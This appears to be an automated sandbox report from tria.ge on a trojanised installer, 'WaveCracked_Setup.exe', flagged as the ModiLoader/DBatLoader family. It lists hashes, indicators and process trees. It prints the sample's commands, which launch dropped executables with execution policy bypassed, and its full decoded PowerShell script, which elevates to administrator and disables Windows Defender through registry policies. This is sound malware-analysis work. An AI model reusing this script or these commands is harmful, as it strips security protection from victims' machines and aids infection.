Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
395s -
max time network
380s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
11/01/2025, 22:12
Static task
static1
General
-
Target
WaveCracked_Setup.exe
-
Size
45KB
-
MD5
7101449b9a90ea416179cefbb79bf959
-
SHA1
32d2be427b63fd96a14ded9d64a68ff05a674fdb
-
SHA256
38c3b07b574abc69b31efc0f98c252214551dd526948293a6f70b79f54dd8bb3
-
SHA512
6ce87169bb0cf49b5fb1fbf21040cbc2367da7abacb3cce0eaac0142ee59bd43508a27d5eb45ca5c3b1269dfccfb1b2cf50df048f694cc98d501768b271d2f82
-
SSDEEP
768:aH4QlpbwGgC7eNB9kTvObyCawfTWccGLrrd9w3NGuDgN:6lpVgi7Obl9faoLrrd9cGuc
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" powershell.exe -
Modiloader family
-
ModiLoader Second Stage 3 IoCs
resource yara_rule behavioral1/memory/3420-29-0x0000000000400000-0x0000000000545000-memory.dmp modiloader_stage2 behavioral1/memory/3420-30-0x0000000000400000-0x0000000000545000-memory.dmp modiloader_stage2 behavioral1/memory/3420-31-0x0000000000400000-0x0000000000545000-memory.dmp modiloader_stage2 -
resource yara_rule behavioral1/files/0x001d00000002aabf-23.dat aspack_v212_v242 -
Executes dropped EXE 5 IoCs
pid Process 3420 tmp1B72.tmp.exe 1616 tmp6696.tmp.exe 2956 tmp12A6.tmp.exe 4192 tmpCF8E.tmp.exe 1712 tmpE309.tmp.exe -
pid Process 3248 powershell.exe 4924 powershell.exe 4640 powershell.exe 4344 powershell.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\setupact.log UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml UserOOBEBroker.exe File opened for modification C:\Windows\SystemTemp chrome.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmp1B72.tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmp6696.tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmp12A6.tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmpCF8E.tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FileCoAuth.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmpE309.tmp.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4836 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133811075060193844" chrome.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
pid Process 3248 powershell.exe 3248 powershell.exe 4924 powershell.exe 4924 powershell.exe 4640 powershell.exe 4640 powershell.exe 4344 powershell.exe 4344 powershell.exe 4348 powershell.exe 4348 powershell.exe 1132 WaveCracked_Setup.exe 3160 chrome.exe 3160 chrome.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe 1132 WaveCracked_Setup.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1132 WaveCracked_Setup.exe Token: SeIncBasePriorityPrivilege 1132 WaveCracked_Setup.exe Token: SeDebugPrivilege 3248 powershell.exe Token: SeDebugPrivilege 4924 powershell.exe Token: SeDebugPrivilege 4640 powershell.exe Token: SeDebugPrivilege 4344 powershell.exe Token: SeBackupPrivilege 584 vssvc.exe Token: SeRestorePrivilege 584 vssvc.exe Token: SeAuditPrivilege 584 vssvc.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe Token: SeShutdownPrivilege 3160 chrome.exe Token: SeCreatePagefilePrivilege 3160 chrome.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe 3160 chrome.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1616 tmp6696.tmp.exe 2956 tmp12A6.tmp.exe 4192 tmpCF8E.tmp.exe 4292 OpenWith.exe 1564 OpenWith.exe 1712 tmpE309.tmp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1132 wrote to memory of 3456 1132 WaveCracked_Setup.exe 78 PID 1132 wrote to memory of 3456 1132 WaveCracked_Setup.exe 78 PID 3456 wrote to memory of 3248 3456 cmd.exe 80 PID 3456 wrote to memory of 3248 3456 cmd.exe 80 PID 3248 wrote to memory of 3420 3248 powershell.exe 81 PID 3248 wrote to memory of 3420 3248 powershell.exe 81 PID 3248 wrote to memory of 3420 3248 powershell.exe 81 PID 1132 wrote to memory of 2380 1132 WaveCracked_Setup.exe 82 PID 1132 wrote to memory of 2380 1132 WaveCracked_Setup.exe 82 PID 2380 wrote to memory of 4924 2380 cmd.exe 84 PID 2380 wrote to memory of 4924 2380 cmd.exe 84 PID 4924 wrote to memory of 1616 4924 powershell.exe 85 PID 4924 wrote to memory of 1616 4924 powershell.exe 85 PID 4924 wrote to memory of 1616 4924 powershell.exe 85 PID 1132 wrote to memory of 3404 1132 WaveCracked_Setup.exe 86 PID 1132 wrote to memory of 3404 1132 WaveCracked_Setup.exe 86 PID 3404 wrote to memory of 4640 3404 cmd.exe 88 PID 3404 wrote to memory of 4640 3404 cmd.exe 88 PID 4640 wrote to memory of 2956 4640 powershell.exe 89 PID 4640 wrote to memory of 2956 4640 powershell.exe 89 PID 4640 wrote to memory of 2956 4640 powershell.exe 89 PID 1132 wrote to memory of 3640 1132 WaveCracked_Setup.exe 94 PID 1132 wrote to memory of 3640 1132 WaveCracked_Setup.exe 94 PID 3640 wrote to memory of 4344 3640 cmd.exe 96 PID 3640 wrote to memory of 4344 3640 cmd.exe 96 PID 4344 wrote to memory of 4192 4344 powershell.exe 97 PID 4344 wrote to memory of 4192 4344 powershell.exe 97 PID 4344 wrote to memory of 4192 4344 powershell.exe 97 PID 1132 wrote to memory of 4348 1132 WaveCracked_Setup.exe 110 PID 1132 wrote to memory of 4348 1132 WaveCracked_Setup.exe 110 PID 3160 wrote to memory of 4848 3160 chrome.exe 117 PID 3160 wrote to memory of 4848 3160 chrome.exe 117 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1336 3160 chrome.exe 118 PID 3160 wrote to memory of 1352 3160 chrome.exe 119 PID 3160 wrote to memory of 1352 3160 chrome.exe 119 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\WaveCracked_Setup.exe"C:\Users\Admin\AppData\Local\Temp\WaveCracked_Setup.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmp1B72.tmp.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmp1B72.tmp.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\tmp1B72.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp1B72.tmp.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3420
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmp6696.tmp.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmp6696.tmp.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Users\Admin\AppData\Local\Temp\tmp6696.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp6696.tmp.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1616
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmp12A6.tmp.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmp12A6.tmp.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Users\Admin\AppData\Local\Temp\tmp12A6.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp12A6.tmp.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2956
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmpCF8E.tmp.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\tmpCF8E.tmp.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Users\Admin\AppData\Local\Temp\tmpCF8E.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpCF8E.tmp.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4192
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc #   t h a n k s   t o   h t t p s : / / s u p e r u s e r . c o m / a / 1 6 4 8 1 0 5  
 # # # #   S T A R T   E L E V A T E   T O   A D M I N   # # # # #  
 P a r a m ( [ P a r a m e t e r ( M a n d a t o r y = $ f a l s e ) ] [ s w i t c h ] $ s h o u l d A s s u m e T o B e E l e v a t e d ,   [ P a r a m e t e r ( M a n d a t o r y = $ f a l s e ) ]   [ S t r i n g ] $ w o r k i n g D i r O v e r r i d e )  
  
 #   I f   p a r a m e t e r   i s   n o t   s e t ,   w e   a r e   p r o p a b l y   i n   n o n - a d m i n   e x e c u t i o n .   W e   s e t   i t   t o   t h e   c u r r e n t   w o r k i n g   d i r e c t o r y   s o   t h a t  
 #     t h e   w o r k i n g   d i r e c t o r y   o f   t h e   e l e v a t e d   e x e c u t i o n   o f   t h i s   s c r i p t   i s   t h e   c u r r e n t   w o r k i n g   d i r e c t o r y  
 i f ( - n o t ( $ P S B o u n d P a r a m e t e r s . C o n t a i n s K e y ( ' w o r k i n g D i r O v e r r i d e ' ) ) )  
 {  
         $ w o r k i n g D i r O v e r r i d e   =   ( G e t - L o c a t i o n ) . P a t h  
 }  
  
 f u n c t i o n   T e s t - A d m i n   {  
         $ c u r r e n t U s e r   =   N e w - O b j e c t   S e c u r i t y . P r i n c i p a l . W i n d o w s P r i n c i p a l   $ ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s I d e n t i t y ] : : G e t C u r r e n t ( ) )  
         $ c u r r e n t U s e r . I s I n R o l e ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s B u i l t i n R o l e ] : : A d m i n i s t r a t o r )  
 }  
  
 #   I f   w e   a r e   i n   a   n o n - a d m i n   e x e c u t i o n .   E x e c u t e   t h i s   s c r i p t   a s   a d m i n  
 i f   ( ( T e s t - A d m i n )   - e q   $ f a l s e )     {  
         i f   ( $ s h o u l d A s s u m e T o B e E l e v a t e d )   {  
                 W r i t e - O u t p u t   " E l e v a t i n g   d i d   n o t   w o r k   : ( "  
                 e x i t  
         }   e l s e   {  
                 #                                                                                                                   v v v v v   a d d   ` - n o e x i t `   h e r e   f o r   b e t t e r   d e b u g g i n g   v v v v v    
                 S t a r t - P r o c e s s   p o w e r s h e l l . e x e   - V e r b   R u n A s   - A r g u m e n t L i s t   ( ' - n o p r o f i l e   - f i l e   " { 0 } "   - s h o u l d A s s u m e T o B e E l e v a t e d   - w o r k i n g D i r O v e r r i d e   " { 1 } " '   - f   ( $ m y i n v o c a t i o n . M y C o m m a n d . D e f i n i t i o n ,   " $ w o r k i n g D i r O v e r r i d e " ) )  
         }  
         e x i t  
 }  
  
 S e t - L o c a t i o n   " $ w o r k i n g D i r O v e r r i d e "  
 # # # # #   E N D   E L E V A T E   T O   A D M I N   # # # # #  
  
 W r i t e - O u t p u t   $ w o r k i n g D i r O v e r r i d e  
  
 $ D e f e n d e r P a t h                                               =   " H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r "  
  
 # $ P o l i c y M a n a g e r K e y                                       =   " P o l i c y   M a n a g e r "  
 $ R e a l T i m e P r o t e c t i o n K e y                             =   " R e a l - T i m e   P r o t e c t i o n "  
 $ S i g n a t u r e U p d a t e s K e y                                 =   " S i g n a t u r e   U p d a t e s "  
 $ S p y n e t K e y                                                     =   " S p y n e t "  
  
 $ A l l o w F a s t S e r v i c e S t a r t u p V a l u e               =   " A l l o w F a s t S e r v i c e S t a r t u p "  
 $ D i s a b l e A n t i S p y w a r e V a l u e                         =   " D i s a b l e A n t i S p y w a r e "  
 $ D i s a b l e A n t i V i r u s V a l u e                             =   " D i s a b l e A n t i V i r u s "  
 $ D i s a b l e R o u t i n e l y T a k i n g A c t i o n V a l u e     =   " D i s a b l e R o u t i n e l y T a k i n g A c t i o n "  
 $ D i s a b l e S p e c i a l R u n n i n g M o d e s V a l u e         =   " D i s a b l e S p e c i a l R u n n i n g M o d e s "  
 $ S e r v i c e K e e p A l i v e V a l u e                             =   " S e r v i c e K e e p A l i v e "  
 $ D i s a b l e B e h a v i o r M o n i t o r i n g V a l u e           =   " D i s a b l e B e h a v i o r M o n i t o r i n g "  
 $ D i s a b l e O n A c c e s s P r o t e c t i o n V a l u e           =   " D i s a b l e O n A c c e s s P r o t e c t i o n "  
 $ D i s a b l e R e a l t i m e M o n i t o r i n g V a l u e           =   " D i s a b l e R e a l t i m e M o n i t o r i n g "  
 $ D i s a b l e S c a n O n R e a l t i m e E n a b l e V a l u e       =   " D i s a b l e S c a n O n R e a l t i m e E n a b l e "  
 $ F o r c e U p d a t e F r o m M U V a l u e                           =   " F o r c e U p d a t e F r o m M U "  
 $ D i s a b l e B l o c k A t F i r s t S e e n V a l u e               =   " D i s a b l e B l o c k A t F i r s t S e e n "  
  
 $ W i n d o w s D e f e n d e r I s D i s a b l e d P e r m a n e n t l y   =   " W i n d o w s D e f e n d e r I s D i s a b l e d P e r m a n e n t l y "  
  
 I f ( T e s t - P a t h   - P a t h   $ D e f e n d e r P a t h )   {  
         W r i t e - h o s t   - f   G r e e n   " K e y   E x i s t s ! "  
 }  
 E l s e   {  
         W r i t e - h o s t   - f   Y e l l o w   " K e y   d o e s n ' t   E x i s t s ! "  
         e x i t  
 }  
  
 $ I s A l e a d y D i s a b l e d   =   G e t - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h "   - N a m e   " $ W i n d o w s D e f e n d e r I s D i s a b l e d P e r m a n e n t l y "   - E r r o r A c t i o n   S i l e n t l y C o n t i n u e  
 I f ( $ I s A l e a d y D i s a b l e d )  
 {  
         W r i t e - E r r o r   " Y o u   h a v e   a l r e a d y   d i s a b l e d   w i n d o w s   d e f e n d e r ! "  
         P a u s e  
         e x i t  
 }  
  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h "   - N a m e   " $ W i n d o w s D e f e n d e r I s D i s a b l e d P e r m a n e n t l y "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
  
 # N e w - I t e m   - P a t h   " $ D e f e n d e r P a t h \ $ P o l i c y M a n a g e r K e y "  
 N e w - I t e m   - P a t h   " $ D e f e n d e r P a t h \ $ R e a l T i m e P r o t e c t i o n K e y "  
 N e w - I t e m   - P a t h   " $ D e f e n d e r P a t h \ $ S i g n a t u r e U p d a t e s K e y "  
 N e w - I t e m   - P a t h   " $ D e f e n d e r P a t h \ $ S p y n e t K e y "  
  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h "   - N a m e   " $ A l l o w F a s t S e r v i c e S t a r t u p V a l u e "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h "   - N a m e   " $ D i s a b l e A n t i S p y w a r e V a l u e "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h "   - N a m e   " $ D i s a b l e A n t i V i r u s V a l u e "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h "   - N a m e   " $ D i s a b l e R o u t i n e l y T a k i n g A c t i o n V a l u e "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h "   - N a m e   " $ D i s a b l e S p e c i a l R u n n i n g M o d e s V a l u e "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h "   - N a m e   " $ S e r v i c e K e e p A l i v e V a l u e "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h "   - N a m e   " $ D i s a b l e R e a l t i m e M o n i t o r i n g V a l u e "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h \ $ R e a l T i m e P r o t e c t i o n K e y "   - N a m e   " $ D i s a b l e B e h a v i o r M o n i t o r i n g V a l u e "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h \ $ R e a l T i m e P r o t e c t i o n K e y "   - N a m e   " $ D i s a b l e O n A c c e s s P r o t e c t i o n V a l u e "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h \ $ R e a l T i m e P r o t e c t i o n K e y "   - N a m e   " $ D i s a b l e R e a l t i m e M o n i t o r i n g V a l u e "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h \ $ R e a l T i m e P r o t e c t i o n K e y "   - N a m e   " $ D i s a b l e S c a n O n R e a l t i m e E n a b l e V a l u e "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h \ $ S i g n a t u r e U p d a t e s K e y "   - N a m e   " $ F o r c e U p d a t e F r o m M U V a l u e "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
  
 N e w - I t e m P r o p e r t y   - P a t h   " $ D e f e n d e r P a t h \ $ S p y n e t K e y "   - N a m e   " $ D i s a b l e B l o c k A t F i r s t S e e n V a l u e "   - V a l u e   " 1 "   - P r o p e r t y T y p e   D w o r d  
  
 P a u s e 2⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /k timeout 10 > NUL && "C:\Users\Admin\AppData\Local\Temp\tmpE309.tmp.exe"2⤵PID:4292
-
C:\Windows\system32\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
PID:4836
-
-
C:\Users\Admin\AppData\Local\Temp\tmpE309.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpE309.tmp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1712
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:568
-
C:\Windows\System32\oobe\UserOOBEBroker.exeC:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding1⤵
- Drops file in Windows directory
PID:2432
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding1⤵
- System Location Discovery: System Language Discovery
PID:4820
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:584
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4292
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1564
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
